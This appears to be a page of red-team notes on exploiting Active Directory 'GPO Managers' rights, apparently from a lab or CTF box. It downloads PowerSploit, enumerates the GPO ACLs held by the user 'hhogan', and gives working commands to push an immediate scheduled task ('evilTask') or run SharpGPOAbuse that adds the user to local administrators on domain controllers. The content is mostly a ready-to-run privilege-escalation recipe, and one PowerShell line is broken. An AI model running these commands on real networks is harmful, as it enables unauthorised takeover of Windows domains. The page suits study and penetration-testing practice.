Basics

Exploit

Enumerate

wget https://github.com/PowerShellMafia/PowerSploit/archive/26a0757612e5654b4f792b012ab8f10f95d391c9.zip -O PowerSploit.zip
unzip PowerSploit.zip
mv PowerSploit-26a0757612e5654b4f792b012ab8f10f95d391c9 PowerSploit 
# import to windows machine

On Windows

cd ~/AppData/Local/Temp/
upload PowerSploit
cd PowerSploit
Import-Module .\PowerSploit.psd1
gci -directory | % { ipmo $_.FullName -ErrorAction SilentlyContinue

Enumerate GPos and their ACLs :

# Store username and group in variables
$username = 'OFFICE\hhogan'
$group = 'OFFICE\GPO Managers'
# Store GPOs in a variable
$gpos = Get-NetGPO
# Get the ACLs on each GPO
$gpoAcls = $gpos | ForEach-Object { Get-ObjectAcl -ResolveGUIDs -Name $_.Name }
# Enumerate any GPOs where we have access
$gpoAcls | Where-Object {$_.IdentityReference -in @($username, $group)} | Select-Object @{Name = 'GPOName' ; Expression = {$gpos | Where-Object distinguishedname -eq $_.ObjectDN | Select-Object -Expand DisplayName}}, IdentityReference, AccessControlType, ActiveDirectoryRights

Make our user, local admin

# With NewGPOImmediateTask
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators hhogan /add" -GPODisplayName "Default Domain Controllers Policy" -Verbose -Force
gpupdate /force
 
# OR SharpGPOAbuse
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"

Log out and log back !

❯ RedSquad

Explorer

GPO Managers Exploit

Basics

Exploit

Enumerate

Make our user, local admin

Table of Contents